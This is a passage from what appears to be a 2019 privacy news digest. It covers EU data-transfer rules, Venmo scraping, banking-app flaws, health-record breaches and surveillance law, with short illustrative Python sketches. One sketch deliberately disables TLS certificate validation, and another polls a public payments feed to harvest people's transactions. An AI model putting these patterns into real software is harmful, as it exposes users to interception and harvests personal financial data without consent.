  • 68% of the participants identified a need to incorporate the requirements of Article 28 of the EU General Data Protection Regulation into the Controller-to-Processor SCCs; and
  • When asked about new sets of SCCs, 84% of the participants identified the need to put in place Processor-to-Subprocessor SCCs.

The seminar also highlighted the advantages of SCCs, such as:
  • the absence of formalities vis-à-vis EU data protection authorities,
  • the possibility to transfer data to any non-EU country,
  • the application to both intra-group and external data flows, and
  • their effectiveness as a quick and readymade tool, especially appreciated by Small and Medium Enterprises.

Participants mainly identified SCC disadvantages as due to:

  • the absence of flexibility as SCCs cannot be modified;
  • the administrative burden that SCCs entail;
  • the non-application to specific data transfer scenarios, such as data transfers between a Processor-to-(Sub)Processor; and
  • the uncertain outcome of the Schrems II case [read recent coverage here], which is pending before the Court of Justice of the European Union.

In that context, participants also discussed possible solutions to remedy these disadvantages.

Sources: [Privacy & Information Security Law Blog (Hunton Andrews Kurth) | European court to rule on validity of GDPR Standard Contractual Clauses | Facebook fails to stop Europe’s top court weighing in on EU-US data transfers | Facebook loses Supreme Court appeal in Max Schrems case]

EU – EDPB Adopts Final Draft Guidelines in Plenary Session

The European Data Protection Board announced a trio of guidelines that were adopted during its 11th plenary session Tuesday. Guidelines on Codes of Conduct, Accreditation and Certification were finalized by the board in an effort to strengthen and clarify parts of the EU General Data Protection Regulation. The Guidelines on Codes of Conduct set out to help organizations interpret and apply Articles 40 and 41 of the GDPR. An annex to the Guidelines for Accreditation will aid the implementation of Article 43’s provisions, while a second annex to the Guidelines on Certification will identify overarching criteria for certification mechanisms under Articles 42 and 43. [EDPB]

EU – EDPS Inspection Reveals Data Protection Threats on EU Institutions’ Websites

The office of the European Data Protection Supervisor announced a recent analysis of EU institutions’ websites revealed seven out of ten websites had data protection issues. The EDPS inspection reviewed the data protection compliance of various public web services under EU Regulation 2018/1725, the ePrivacy Directive and EDPS guidelines on web services. Nonconsensual third-party tracking and the use of web trackers without visitor consent were among the issues found during the inspection. EDPS Giovanni Buttarelli said most inspected institutions have rectified their compliance issues. “The responses to this remote inspection have been reassuring,” Buttarelli said. “The EU institutions responsible for the most important websites have informed us of technical measures that they have implemented to significantly reduce the risks to security and privacy that were detected in our inspection.” [EDPS]
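
To make the inspection concrete: the sketch below, a simplification with an illustrative URL rather than the EDPS’s actual tooling, fetches a page and lists resources loaded from hosts other than the site’s own domain, the basic signal behind flagging nonconsensual third-party tracking. A static fetch like this misses trackers injected by JavaScript, which is why real inspections rely on instrumented browsers.

  # A simplified remote tracker check: fetch a page with the standard library
  # and list resource hosts that differ from the page's own domain. The URL
  # below is illustrative, not one of the inspected EU institution sites.
  from html.parser import HTMLParser
  from urllib.parse import urlparse
  from urllib.request import urlopen

  class ResourceCollector(HTMLParser):
      """Collects the hosts that scripts, images and iframes load from."""
      def __init__(self):
          super().__init__()
          self.hosts = set()

      def handle_starttag(self, tag, attrs):
          if tag in ("script", "img", "iframe"):
              for name, value in attrs:
                  if name == "src" and value and value.startswith("http"):
                      self.hosts.add(urlparse(value).netloc)

  def third_party_hosts(url):
      first_party = urlparse(url).netloc
      html = urlopen(url).read().decode("utf-8", errors="replace")
      collector = ResourceCollector()
      collector.feed(html)
      # Any resource served from another host is a candidate third-party tracker.
      return {h for h in collector.hosts if not h.endswith(first_party)}

  for host in sorted(third_party_hosts("https://example.org/")):
      print("third-party resource host:", host)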

EU – Cybersecurity Act Gets The Green Light!

On 7 June 2019, Regulation (EU) 2019/881 on the European Union Agency for Network and Information Security [ENISA] and on information and communications technology cybersecurity certification, also known as the Cybersecurity Act, was given the final go-ahead and published in the Official Journal of the European Union. The Cybersecurity Act will come into force on 27 June 2019. Cyberattacks are becoming more and more sophisticated and most often occur across borders. There is a growing need for effective and coordinated responses and crisis management at the EU level. The Cybersecurity Act aims to build a safer cyber environment through an EU-wide framework for businesses to achieve cybersecurity certification for their information and communications technology (ICT) products, processes and services. ENISA will assume the key role of supervising and advancing cooperation and information sharing across EU member states, EU institutions and international organisations. The past two years have seen cybersecurity turning into a high priority on the Brussels agenda. The Cybersecurity Act forms part of a set of measures across the board intended to promote more robust cybersecurity within the EU by establishing the first EU-wide cybersecurity certification framework across a broad range of products (e.g. the Internet of Things) and services. The Cybersecurity Act works alongside both: a) the EU General Data Protection Regulation, which requires security measures to be implemented when processing personal data; and b) the EU Network and Information Security Directive [NIS Directive], which aims to protect critical national infrastructure. While the NIS Directive applies only to operators of essential services and digital service providers, the Cybersecurity Act encourages all businesses to invest more in cybersecurity and to build it into their ICT devices. Ultimately, the collective framework of legislation is designed to counteract cyberattacks and to raise consumers’ and industry players’ trust in ICT solutions. [Technology Law Dispatch (Reed Smith)]

EU – Council of the EU Adopts Conclusions on Data Use to Combat Crime

The Council of the European Union announced it has concluded that the Working Party on Information Exchange and Data Protection can continue its work on data retention for the purpose of fighting crime. The council added in its conclusions that the European Commission will have the right to continue exploring retention practices and make recommendations on their effectiveness. “The Council noted that data retention is an essential tool for investigating serious crime efficiently, but one whose use should be guided by the need to protect fundamental rights and freedoms,” the council said in its release. [Consilium]

Finance

WW – Millions of Venmo Transactions Scraped In Warning Over Privacy Settings

Dan Salmon, a graduate student in information security, has scraped seven million Venmo transactions [Venmo is a peer-to-peer mobile payments service – see here] to prove that users’ public activity can still be easily obtained a year after Hang Do Thi Duc, a former Mozilla fellow, downloaded 207 million transactions in a similar feat [read coverage here]. Salmon said he scraped the transactions over a cumulative six months to raise awareness and warn users to set their Venmo payments to private. Both scraping efforts were possible because Venmo payments between users are public by default. Salmon published the scraped data on his GitHub page [see here], showing little has changed and that it’s still easy to download millions of transactions through the company’s developer API without obtaining user permission or needing the app. Using that data, anyone can look at an entire user’s public transaction history, who they shared money with, when, and in some cases for what reason — including illicit goods and substances. Indeed, last year’s disclosure inspired several new projects — including a bot that tweeted out every time someone bought drugs [read Motherboard coverage]. Venmo has done little to curb the privacy issue for its 40 million users. Instead, Venmo has focused its effort on making the data more difficult to scrape rather than addressing the underlying privacy issues. Last year, PayPal — which owns Venmo — settled with the FTC over privacy and security violations [read FTC PR here]. The company was criticized for misleading users over its privacy settings. The FTC said users weren’t properly informed that some transactions would be shared publicly, and that Venmo misrepresented the app’s security by saying it was “bank-grade,” which the FTC disputed. [TechCrunch | Most US mobile banking apps have security and privacy flaws, researchers say]
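
To see why public-by-default data is so easily harvested, consider this minimal sketch of the polling pattern described above. The endpoint URL and JSON field names are hypothetical stand-ins, not Venmo’s actual API, and Salmon’s real scraper on GitHub is considerably more involved.

  # A minimal sketch of scraping an unauthenticated public transaction feed.
  # The endpoint URL and field names below are hypothetical stand-ins.
  import json
  import time
  from urllib.request import urlopen

  FEED_URL = "https://api.example-payments.com/v1/public?limit=50"  # hypothetical

  def poll_public_feed(pages=3, delay=1.0):
      seen = set()
      for _ in range(pages):
          with urlopen(FEED_URL) as resp:
              feed = json.load(resp)
          for tx in feed.get("data", []):
              if tx["id"] not in seen:
                  seen.add(tx["id"])
                  # Sender, recipient and memo are all visible without logging in.
                  print(tx["actor"], "->", tx["target"], ":", tx.get("note", ""))
          time.sleep(delay)  # polite rate limiting between polls

  poll_public_feed()

The point of the sketch is that no credentials, tokens or app install appear anywhere: a default-public feed means a few dozen lines of standard-library code can accumulate a transaction archive indefinitely.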

US – Most Mobile Banking Apps Have Security and Privacy Flaws: Researchers

New findings from security firm Zimperium say most of the top banking apps have security flaws that put user data at risk. Zimperium downloaded the iOS and Android apps of the top 45 US banks and mobile payment providers and scanned for security and privacy issues, like data leaks, which put private user data and communications at risk [access report here]. Most of the apps had issues, like failing to adhere to best coding practices and using old open-source libraries that are infrequently updated. Some of the apps were using open-source code from GitHub from more than three years ago. Worse, more than half of the banking apps are sharing customer data with at least one advertiser. The researchers, who didn’t name the banks, said one of the worst offending iOS apps scored 86 out of 100 on the risk scale for several privacy lapses, including communicating over an unencrypted HTTP connection. The same app was vulnerable to two known remote bugs dating back to 2015. The researchers said the risk scores for the banks’ corresponding Android apps were far higher. Two of the apps were rated with a risk score of 82 out of 100. Both of the apps were storing data in an insecure way, which third-party apps could access and recover sensitive data on a rooted device. One of the Android apps wasn’t properly validating HTTPS certificates, making it possible for an attacker to perform a man-in-the-middle attack. Several of the iOS and Android apps were capable of taking screenshots of the app’s display, increasing the risk of data leaking. Two-thirds of the Android banking apps are targeted by several malware campaigns, such as BankBot, which tricks users into downloading fake apps from Google Play and waits until the victim signs in to a banking app on their phone. Using an overlay screen, the malware campaigns steal logins and passwords. [TechCrunch]
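
The certificate-validation flaw deserves a concrete illustration. The toy client below, written in Python for brevity (the affected apps are Android), contrasts a properly validated TLS connection with one that disables chain and hostname checks, which is what exposes an app to a man-in-the-middle.

  # Contrast proper certificate validation with the disabled validation
  # described above. With verification off, an attacker's certificate is
  # accepted and the "secure" channel can be silently intercepted.
  import socket
  import ssl

  def fetch_over_tls(host, verify=True):
      context = ssl.create_default_context()
      if not verify:
          # The flaw: skip hostname and chain checks, accepting any certificate.
          context.check_hostname = False
          context.verify_mode = ssl.CERT_NONE
      with socket.create_connection((host, 443)) as sock:
          with context.wrap_socket(sock, server_hostname=host) as tls:
              print(host, "negotiated", tls.version(), "| verified:", verify)

  fetch_over_tls("example.org", verify=True)   # safe: a MITM handshake fails
  fetch_over_tls("example.org", verify=False)  # vulnerable: any cert accepted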

FOI

CA – NWT to Have Most Progressive Access to Information Law in Canada

The Northwest Territories will soon have the most progressive access to information law in the country, which will subject all municipalities to access to information provisions. On May 30, MLAs unanimously gave final approval to the first major overhaul of the territory’s Access to Information and Protection of Privacy Act since it became law 23 years ago. The newly revised act gives Information and Privacy Commissioner Elaine Keenan-Bengts the authority to order the release of information, rather than only making recommendations. Under the new law, Keenan-Bengts’ decisions stand unless the government goes to court and convinces a judge to overturn them. “I will no longer be making recommendations, I will be making orders, which can be filed with the court and enforced as a court order,” said Keenan-Bengts. “Over the years, the respect given to the recommendations made by my office has gone downhill. I’ve heard it said that there is in many parts of the government the feeling that, ‘There’s nothing she can really do except make recommendations, so don’t worry about it.’ They won’t be able to do that anymore.” The act still includes a long list of exceptions for government information, but now they will all be trumped by the public interest. Regardless of the exemptions, the heads of government departments and other senior officials will be required to release information when it is clearly in the public interest to do so. [CBC News]

CA – Secret Cold War File on Pierre Trudeau Destroyed by CSIS

The Canadian Security Intelligence Service [CSIS] says a secret Cold War file on former prime minister Pierre Trudeau was scrapped in 1989 instead of being turned over to the national archives because it fell short of the legal threshold for retention by either the service or the archives. The Trudeau file was among hundreds of thousands CSIS inherited in the 1980s after the RCMP Security Service was dissolved following a series of scandals. In a bid to uncover subversives out to disrupt the established order, RCMP spies eyed a staggering variety of groups and individuals, from academics and unions to environmentalists, peace groups and even politicians. Security records on individuals become eligible for disclosure under the Access to Information Act only 20 years after a person’s death. Until then, even the existence of a file is secret due to privacy considerations. Next year marks the 20th anniversary of Trudeau’s death, so The Canadian Press recently requested the former prime minister’s RCMP file under the access law from Library and Archives Canada and CSIS, given that it can take many months to process such applications. The archives swiftly replied that it does not have a Trudeau dossier. CSIS said its records indicate the file was destroyed on Jan. 30, 1989, claiming a 1988 analysis of the Trudeau file concluded it did not meet the threshold in the CSIS Act to justify being kept in the service’s active inventory. The file also fell short of criteria for preservation set out by the national archives and was therefore destroyed the following year, CSIS added. In stark contrast, the U.S. FBI, which worked closely with the Mounties, kept watch on Trudeau for more than 30 years, charting his path from globetrotting public intellectual who visited the Soviet Union in the early 1950s through his time as a Liberal prime minister. The bureau’s heavily censored, 151-page dossier was released under the U.S. Freedom of Information Act just months after Trudeau’s death in September 2000, in keeping with American disclosure practices. News of the decision to purge the file has stunned and disappointed historians. “It’s just outrageous, there’s no other word to describe it,” said John English, who wrote an acclaimed biography of Trudeau. “It’s a tragedy that this has happened, and I think the explanation is weak.” Steve Hewitt, a senior lecturer at the University of Birmingham who has spent years chronicling the country’s security services, called the destruction “a crime against Canadian history. This wanton destruction cries out for parliamentary intervention to ensure that historically significant documents held by government agencies are preserved instead of being made to disappear down an Orwellian memory hole.” It is the sort of practice “expected of an authoritarian state and not a proper democracy that values its history,” said Hewitt, co-author of the recent Just Watch Us, which delves into RCMP surveillance of the women’s movement. [Global News]

Health / Medical

CA – New Brunswickers’ Privacy at Risk When Medicare Cards Renewed: AG

The private information of “virtually every” New Brunswicker is at risk through the outsourcing and automatic renewal of medicare cards, says Kim MacPherson, the province’s auditor general, in her 2019 Auditor General’s Report [read Vol 1 & PR] released at the legislature. The audit found there have been 157 privacy breaches since 2017, including 31 so far this year. The majority relate to mailing addresses not being verified before medicare cards are mailed out, she said. Two private contracted companies — Medavie Blue Cross and CPI Card Group — possess sensitive personal data on New Brunswickers, including credit card information, noted MacPherson: “It is very important that Medicare safeguard that information and ensure it is only used for its intended purposes. Failure to do so subjects NB residents to the potential of identity theft, and the Province to financial and reputational risks,” she wrote. [CBC News]

CA – Privacy Breach Spurs Surveillance of Employee’s Access to Health Charts

P.E.I.’s privacy watchdog wants Health PEI to keep closer tabs on one of its employees’ use of patient health records, following a privacy breach last year at Queen Elizabeth Hospital. That’s according to a new report by Information and Privacy Commissioner Karen Rose, posted May 30 [Breach Report HI-19-002]. In March 2018, a patient received a copy of their electronic patient chart from Health PEI. That chart included a log showing who had accessed the patient’s health information, and when. The patient alerted Health PEI to concerns over one employee at QEH, personally known to the patient, who, according to the log, had accessed the patient’s medical records several times. According to the report, when asked about the allegation, the employee told Health PEI that all of their access to the patient’s health information was for “professional reasons.” Also according to the report, the employee indicated “a long history of a volatile relationship” between the employee and patient, and was concerned the privacy complaint was made by the patient “with malicious intent.” Health PEI investigated and found that the employee’s job duties required access to patients’ medical records, including those of the patient in question. However, the agency’s investigation concluded the employee had accessed the patient’s records without authorization on some occasions, and the employee was unable to offer a reasonable explanation for why the records had been accessed on those occasions. The employee was disciplined, but not fired. According to the commissioner’s report, the health agency followed correct procedures in alerting the patient as well as the privacy commissioner, and in containing and investigating the breach. For remediation, Health PEI said it would provide privacy refresher training and would introduce random auditing of staff access to patient electronic charts in the employee’s area. But the privacy commissioner recommended Health PEI go further with its monitoring of the employee in question. She recommended Health PEI introduce regular auditing of the employee’s access to patient records, with particular attention to the personal health information of the patient whose privacy was breached. Health PEI confirms it will take this action. [CBC News | 1,041 P.E.I. dental patients identified in privacy breach]
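
The targeted auditing the commissioner recommended amounts, at its simplest, to scanning chart-access logs for views that lack a documented care reason. The sketch below illustrates the idea only; the CSV layout, field names and IDs are assumptions made for this illustration, not Health PEI’s actual records schema.

  # An illustrative audit pass over a chart-access log: list accesses by a
  # flagged employee to a flagged patient's records that lack a documented
  # care reason. All field names and IDs here are hypothetical.
  import csv

  FLAGGED_EMPLOYEE = "E1234"  # hypothetical staff ID
  FLAGGED_PATIENT = "P5678"   # hypothetical patient ID

  def audit_access_log(path):
      hits = []
      with open(path, newline="") as f:
          for row in csv.DictReader(f):
              if (row["employee_id"] == FLAGGED_EMPLOYEE
                      and row["patient_id"] == FLAGGED_PATIENT
                      and row.get("care_relationship") != "yes"):
                  hits.append((row["timestamp"], row["action"]))
      return hits

  for when, action in audit_access_log("chart_access_log.csv"):
      print(f"unexplained access at {when}: {action}")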

CA – Almost 3,000 Nova Scotians May Be Victims of Medical Records Privacy Breach, Says NSHA

Medical records of 2,841 people could be compromised after a Nova Scotia Health Authority employee recently fell victim to an email scam, the health authority said [read NSHA PR]. The employee clicked on a link in the email, enabling the attacker to access the contents of the employee’s inbox, which contained the thousands of medical records. However, it’s not known whether the attacker accessed those files. “So we are alerting that there was a potential breach,” said spokeswoman Carla Adams. The NSHA is sending out notifications to all the suspected victims and next of kin. Adams said the Office of the Information and Privacy Commissioner of Nova Scotia had been notified of the breach. IPC Catherine Tully released her annual report last week [read 3 PDF], showing there were at least 865 privacy breaches of medical records between April 1, 2018 and March 31, 2019. Matt Saunders, a Halifax lawyer specializing in cybersecurity and privacy law, said people have a legitimate reason to question the province’s data protection systems and whether provincial government staff are being adequately trained to spot and prevent what have become repeated breaches of people’s medical records. Progressive Conservative opposition health critic Karla MacFarlane said the latest breach is cause for concern as the Liberal government prepares to move to a One Person One Record system. MacFarlane also pointed to Auditor General Michael Pickup’s 2018 performance audit, in which he cited significant risks with the province’s information technology management, and questioned whether the province can be trusted to modernize Nova Scotia’s health information systems. [The Chronicle Herald (Halifax) | Possible privacy breach at Nova Scotia Health Authority affects nearly 3,000 people | NSHA suffers privacy breach, nearly 3,000 patients possibly affected]

Horror Stories

US – Court Awards $68M over Improper Access to Personal Records

A Pennsylvania district court awarded $1,000 each to the 68,000 members of a class action that claimed Bucks County and other municipal institutions violated state law by making their criminal records public. The case began in 2012, when Daryoush Taha alleged that the county’s publicly accessible inmate search tool included access to an online database with criminal history records for all current and former Bucks County Correctional Facility inmates dating back to 1938. Public access to the records is unlawful under the state’s Criminal History Records Information Act. Plaintiffs argued the failure to review and abide by the law came with “reckless indifference,” and a jury found there was a “willful” violation of the law. [Workplace Privacy, Data Management & Security Report blog]

Law Enforcement

CA – Mountie Broke Law When He Leaked Protester’s Background: Watchdog

In 2015, a British Columbia Mountie broke the law when he started snooping into a protester’s background and leaked information to city officials — but it took an outside investigation to convince RCMP brass to see it that way. The Civilian Review and Complaints Commission [CRCC] report, obtained through access to information law, is heavily redacted; it doesn’t even disclose the name of the municipality. However, it describes how the RCMP got involved after the person who filed the complaint with the CRCC — a boisterous protester — held up a sign at a municipal meeting that read “Pinko Commie.” The report says the municipality was concerned about the protester escalating his efforts. According to emails obtained by the commission, RCMP Insp. Al O’Donnell used PRIME — an electronic record management system used by police in British Columbia [see BCCLA on PRIME] — and other databases to find out if the protester had any past run-ins with police. The protester’s record was clean, according to the report, and the RCMP relayed that news to the municipality. The RCMP investigated the protester’s original complaint and found its members acted “reasonably,” defending the background search as conducted in the public’s interest. The CRCC disagreed, saying: “The commission found that Inspector O’Donnell did unreasonably disclose redacted personal information contrary to law and policy. Superintendent Mark Fisher unreasonably authorized the disclosure.” The Privacy Act prohibits the disclosure of personal information by government institutions, except in limited circumstances. The RCMP says all detachment members were informed of the restrictions on the disclosure of personal information under RCMP E Division policy and the Privacy Act. The commission’s other recommendation was completely redacted. [CBC News]

Location

US – He Won a Landmark Case for Privacy Rights. He’s Going to Prison Anyway

Timothy Carpenter won’t be remembered for the circumstances that landed him in prison, but for the Supreme Court case that bears his name [read SCOTUS decision]. Carpenter v. United States, which set a new benchmark for privacy in the digital age, requires the police to obtain a warrant before obtaining cellphone location history from a phone company. Privacy advocates hailed the ruling, and saw in it the potential for broader protections for personal data in the digital age. Yet one curiosity of the case, as with similar Fourth Amendment rulings that limit the government’s reach into our private lives, is that it won’t be of any help to Mr. Carpenter. This week, a federal appeals court decided that Mr. Carpenter’s big victory at the Supreme Court won’t spare him from going to prison for the rest of his life [read June 11 6th Circuit ruling]. Under what’s called the exclusionary rule, any evidence obtained in violation of the Constitution cannot be used at trial. In Mr. Carpenter’s case, that meant about 129 days’ worth of cellphone tracking data. That should have meant a decisive victory for Mr. Carpenter. Not so, said the United States Court of Appeals for the Sixth Circuit, which took the Supreme Court’s pronouncement and more or less said that it didn’t matter. The appeals court acknowledged that the government “violated the Fourth Amendment” when F.B.I. agents sought and obtained, without a warrant, Mr. Carpenter’s location data. But under the good-faith exception to violations of the Fourth Amendment, the court said the agents acted reasonably and in “good faith” — and so whatever they gathered could still be used at trial. The F.B.I. merely followed the law and the rules that applied at the time of the violation. According to the A.C.L.U.’s Nathan Wessler, who argued and won the Carpenter case before the Supreme Court: “When courts dodge the Fourth Amendment question and rule just on good faith, it leaves the public and police without clear guidance about what the Fourth Amendment means and how it should apply to novel but important digital-age intrusions” [The New York Times]

Online Privacy

US – Consumer Reports Introduces New Data Privacy Initiative

Consumer Reports is rolling out Digital Lab, a new investigative entity that examines and rates the data privacy features of web-based products and services. Digital Lab’s analysis will focus on areas of privacy, transparency, security and data collection methods. “You can’t overlook the incredible change in the marketplace and in products and services that consumers are really trying to navigate,” Consumer Reports President and CEO Marta Tellado said. “And I think now more than ever, they’re looking for a trusted and independent partner that can provide a road map.” The new venture has the backing of Craigslist Founder Craig Newmark, who pledged $6 million to the cause and will serve as an honorary chair to an advisory council that will help Digital Lab grow. [Fast Company]

US – Removing Data from ‘People Search Engines’ Can Be a Challenge

Individuals face problems when they attempt to have their information removed from “people search engines,” which collect names, addresses, details of lawsuits and photos. The data is drawn from public records, social media profiles, paid-for databases and, more recently, genealogy sites, such as Ancestry.com. Some people listed on the search engines have tried to remove their data from the sites; however, they are either asked to pay a fee or must wait months before their request is honored. Organizations that have monitored the broker sites find the information often reappears within months. [Financial Times]

US – Developers Removed from Apple’s App Store Propose API to Address Privacy Concerns

A group of companies claims to have addressed the privacy concerns that caused Apple to drop them from its App Store. The tech giant removed several apps offering services designed to limit the amount of time users and their children spend on their iPhones. Following the decision, 17 companies affected by the removal proposed an application programming interface they claim can track screen time without compromising user privacy. While the developers released the proposal, Apple would have to create the API itself. Meanwhile, The Wall Street Journal tested various iPhone apps to see which ones used third-party trackers. [The New York Times]

US – CEOs Reflect on Apple’s New Privacy-Safe Social Login Option

CEOs have reacted to Apple’s new privacy-focused login button for apps. When Apple announced it was launching a privacy-safe login with iOS 13 as a way for users to sign in without being tracked, several advertisers took notice. With the forthcoming iOS 13, users will not have to sign in with the same email address; rather, Apple will generate a different email for every app or service that person uses as a way to prevent third parties from connecting a real email address to cross-app activity. For example, mParticle CEO Michael Katz said, “This is part of a continued overall trend where brands will need to prioritize the customer experience over a growth-at-all-costs approach.” [AdExchanger]
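
The mechanism is, in essence, a per-app email relay: every app sees a distinct random forwarding address tied to a single real inbox, so two services cannot join their user lists on a shared email. The sketch below illustrates the concept only; the class, names and domains are hypothetical, and Apple’s actual implementation has not been published.

  # A conceptual sketch of a per-app email relay. Each app gets a distinct
  # random forwarding address mapped to one real inbox, so cross-app activity
  # cannot be linked via a shared email. All names and domains are hypothetical.
  import secrets

  class EmailRelay:
      def __init__(self, real_address):
          self.real_address = real_address
          self.aliases = {}  # app name -> relay address

      def alias_for(self, app):
          # One stable alias per app; a fresh random one for each new app.
          if app not in self.aliases:
              self.aliases[app] = f"{secrets.token_hex(8)}@relay.example.com"
          return self.aliases[app]

      def deliver(self, alias, message):
          # Mail sent to any alias is forwarded to the single real inbox.
          if alias in self.aliases.values():
              print(f"forwarding to {self.real_address}: {message}")

  relay = EmailRelay("user@icloud.example")
  print(relay.alias_for("NewsApp"))  # distinct address per app
  print(relay.alias_for("ShopApp"))  # cannot be linked to the first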

US – Breaking Down How ‘Dark Patterns’ Affect Online Users

The Wall Street Journal reports on tech companies’ use of “dark patterns” to prompt users to agree to actions that benefit the organization rather than the individual. Websites may use bright colors, big buttons and misleading deals to get users to share more information than they originally intended or to agree to subscriptions. Social media companies may also set privacy options to the least private settings by default, forcing users to manually change them within the platform. A proposed bill from Sens. Mark Warner, D-Va., and Deb Fischer, R-Neb., aims to ban the practice. [WSJ.com]
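
Defaults do much of the work in this pattern, since most users never open a settings screen. The toy Python contrast below (the setting names are invented for illustration) shows why the default dictionary, rather than the available options, largely decides what gets collected in practice:

    # Hypothetical settings, for illustration only.
    DARK_PATTERN_DEFAULTS = {
        "ad_personalization": True,    # pre-enabled; the user must hunt for the switch
        "share_with_partners": True,
        "location_history": True,
    }

    PRIVACY_BY_DEFAULT = {
        "ad_personalization": False,   # nothing is on until the user opts in
        "share_with_partners": False,
        "location_history": False,
    }

    def effective_settings(user_choices, defaults):
        """Whatever the user never touched falls through to the default."""
        return {**defaults, **user_choices}

    # A user who never visits the privacy screen:
    print(effective_settings({}, DARK_PATTERN_DEFAULTS))   # everything enabled
    print(effective_settings({}, PRIVACY_BY_DEFAULT))      # everything disabled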

Privacy (US)

US – FTC Takes Action against Companies Falsely Claiming Compliance with the EU-U.S. Privacy Shield, Other International Privacy Agreements

The Federal Trade Commission reached a settlement with SecurTest, Inc., a background screening company, over allegations it falsely claimed to be a participant in the EU-U.S. Privacy Shield program [read decision & order also more docs]. The Commission vote to issue the administrative complaint and to accept the proposed consent agreement with SecurTest was 5-0. In its complaint [read 3 pg PDF], the FTC alleges that SecurTest, Inc., falsely claimed on its website that it participated in the EU-U.S. Privacy Shield [see here, 36 pg PDF framework doc here] and Swiss-U.S. Privacy Shield framework [see here, 69 pg PDF framework doc here & FAQ here], which establish processes to allow companies to transfer consumer data from European Union countries and Switzerland to the United States in compliance with EU and Swiss law, respectively. … While the company initiated a Privacy Shield application in September 2017 with the U.S. Department of Commerce, SecurTest did not complete the steps necessary to be certified as complying with the frameworks. By failing to complete certification, SecurTest was not a certified participant in the frameworks, despite representations to the contrary on its website. The Department of Commerce administers both frameworks, while the FTC enforces the promises companies make when joining those programs. The FTC also sent warning letters to 13 companies that falsely claimed they participate in the U.S.-EU Safe Harbor and the U.S.-Swiss Safe Harbor frameworks. These Safe Harbor agreements are no longer in force, and the last valid self-certifications for either agreement have expired. The FTC demanded they remove from their websites, privacy policies, or any other public documents any statements claiming they participate in either Safe Harbor agreement. If the companies fail to take action within 30 days, the FTC warned it would take appropriate legal action. The FTC also sent warning letters to two companies for claiming in their privacy policies that they are participants in the Asia-Pacific Economic Cooperation [APEC] Cross-Border Privacy Rules [CBPR] system even though they are not certified participants. It instructed the companies to remove from their websites, privacy policies, or any other public documents or statements that might be construed as claiming participation or involvement in the APEC CBPR system unless they prove that they have undergone the requisite review and certification. The FTC warned it would take appropriate legal action if the companies fail to provide a timely and satisfactory response. [News and Events (US FTC)]

US – FTC Releases Agenda for PrivacyCon 2019

The FTC released the final agenda for the fourth annual PrivacyCon [agenda], which will take place on June 27, 2019 in Washington DC and focus on the latest research and trends related to consumer privacy and data security. FTC Chairman Joe Simons will provide opening remarks for PrivacyCon 2019, which will be followed by four sessions of presentations and discussions on research submitted for the event. The first session will focus on research related to privacy policies, disclosures, and permissions and will feature presentations on research examining such topics as the European Union General Data Protection Regulation’s (GDPR) impact on web privacy. The second session will explore research related to consumer preferences, expectations, and behaviors, including a presentation on historical data related to consumers’ understanding and attitudes about digital privacy and online tracking. The third session of the day will focus on research related to tracking and online advertising, including a presentation examining paid and free apps. The last session of the day will focus on research related to vulnerabilities, leaks, and breach notifications, including two presentations focused on vulnerabilities affecting Android applications. The event will be webcast on the FTC website and live tweeted using the hashtag #PrivacyCon19. Registration is not required to attend this event. [News & Events (Federal Trade Commission)]

US – FPF Releases Resources on School Safety and Student Privacy

The Future of Privacy Forum has released a series of resources on school safety and student privacy. The FPF created an animated video and a blog post about the surveillance technologies schools use to protect their students and the impact they can have on student privacy. The video offers steps schools can take to incorporate privacy safeguards into their safety plans. The organization has also released a series of videos to further look at the privacy considerations when surveillance technology is used in schools. The FPF plans to release more resources on the topic in the upcoming months. [FerpaSherpa]

US – Lawsuit Argues Alexa’s Recordings of Children’s Voices Are Unlawful Without Consent

A lawsuit seeking class-action status in Seattle alleges that the nonconsensual collection of children’s voice recordings by Amazon’s Alexa violates laws in at least eight states. The suit points to Amazon’s permanent recording and storing of voices, regardless of consent, as the main point of contention. The allegations also suggest Amazon could inform unknowing parties of the recording and seek their approval, or delete unconsented recordings, but the company does neither. “Alexa routinely records and voiceprints millions of children without their consent or the consent of their parents,” the plaintiffs said in their filed complaint. “At no point does Amazon warn unregistered users that it is creating persistent voice recordings of their Alexa interactions, let alone obtain their consent to do so.” [The Seattle Times]

US – Georgetown Law’s Comprehensive Foreign Intelligence Law Collection

In recognition of the changing role of the Foreign Intelligence Surveillance Court [FISC – see here & wiki here] and the Foreign Intelligence Surveillance Court of Review [FISCR – see here & wiki here]; the difficulty of finding and searching the more than 70 FISC/FISCR declassified opinions and 270 orders in the public domain; the increasing complexity of the Foreign Intelligence Surveillance Act (FISA); the myriad statutory reporting requirements; and the rapidly expanding treatment of FISA in ordinary Article III courts, this blog post announces the creation of the digital Foreign Intelligence Law Collection [see here]. Hosted by the Georgetown University Law Library, the collection is a resource for anyone with an interest in or need to understand the legal framework for U.S. foreign intelligence collection. It is dedicated to ensuring public access to the declassified and redacted opinions, as well as the relevant laws, legislative histories, judicial reports, congressional reports, agency guidelines, declassified and redacted minimization and targeting procedures, and other materials essential to U.S. foreign intelligence collection. All of the FISC opinions and orders are text searchable, as are most of the statutory and regulatory authorities and official reports and correspondence; the collection also offers an annotated bibliography, a selection of particularly thoughtful discussions of matters associated with FISA drawn from hundreds of books, articles, blog posts and law reviews. Instead of just issuing orders, the FISC and FISCR now routinely rule on critically important First, Fourth and Fifth Amendment questions. Their decisions affect separation of powers, common law and the rule of law. The court examines complex matters of statutory construction, and it monitors how the government wields its power. FISC and FISCR opinions also reveal the extent to which government actions comport with, or violate, court directions and the law. Ordinary Article III courts are increasingly having to confront FISA-related constitutional and statutory questions. An important and robust body of law is now emerging from a court that, for decades, has been largely shielded from public inspection. Despite the increasing importance of the courts’ jurisprudence, FISC and FISCR opinions and orders have not hitherto been easily accessible. Of the 70 in the public domain, fewer than two dozen are available on the FISC’s website. Some are available only through the Office of the Director of National Intelligence (ODNI) and are not searchable. Still others are available only from individuals who have submitted Freedom of Information Act requests or engaged in litigation with the Justice Department to obtain the materials, and decided to place them online. Neither Westlaw nor Lexis, moreover, carries most of the opinions, even though FISA issues now regularly appear in ordinary Article III courts. Specifically, the digital Foreign Intelligence Law Collection includes: 1) Foreign intelligence-related statutory and regulatory instruments; 2) The legislative histories of all statutory changes to FISA; 3) All publicly available and declassified opinions and orders issued by the FISC and FISCR; 4) All FISA-related cases in nonspecialized Article III courts; 5) Statutorily required reports on the use of FISA authorities and formal correspondence between the FISC and FISCR; and 6) An annotated bibliography of select secondary sources related to FISA, the FISC and FISCR, and foreign intelligence law.
[Lawfare Blog | Institutional Lack of Candor – FISA Violations | Secret court rebukes NSA for 5-year illegal surveillance of U.S. citizens ]

Privacy Enhancing Technologies (PETs)

US – Stanford Team Creates Privacy-Minded Virtual Assistant

